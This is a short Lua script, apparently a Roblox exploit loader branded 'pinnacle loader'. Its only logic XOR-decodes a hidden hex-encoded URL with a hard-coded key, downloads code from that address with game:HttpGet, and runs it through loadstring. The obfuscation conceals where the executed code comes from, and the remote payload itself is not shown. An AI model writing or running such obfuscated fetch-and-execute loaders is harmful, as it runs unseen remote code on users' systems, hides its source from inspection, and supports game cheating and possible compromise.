--[[


       _                        _        _                 _           
      (_)                      | |      | |               | |          
 _ __  _ _ __  _ __   __ _  ___| | ___  | | ___   __ _  __| | ___ _ __ 
| '_ \| | '_ \| '_ \ / _` |/ __| |/ _ \ | |/ _ \ / _` |/ _` |/ _ \ '__|
| |_) | | | | | | | | (_| | (__| |  __/ | | (_) | (_| | (_| |  __/ |   
| .__/|_|_| |_|_| |_|\__,_|\___|_|\___| |_|\___/ \__,_|\__,_|\___|_|   
| |                                                                    
|_|                                                                    


]]

local a="5b414d46460f195b0f00001d5d0906000d1b01070a1506060b5d415c58411b551b0546070c17070001161e111d13151f11171c030b57530401120c0d175b470f0a4d000c5b411c401056020704580453510e10471b121e5c220015010b115c150515"local b=tostring(3*2*83*7222).."thisisnotencrypted"local function c(d,b)local e=""for f=1,#d,2 do local g=tonumber(d:sub(f,f+1),16)local h=string.byte(b,(f-1)/2%#b+1)e=e..string.char(bit32.bxor(g,h))end;return e end;local i=c(a,b)loadstring(game:HttpGet(i))()
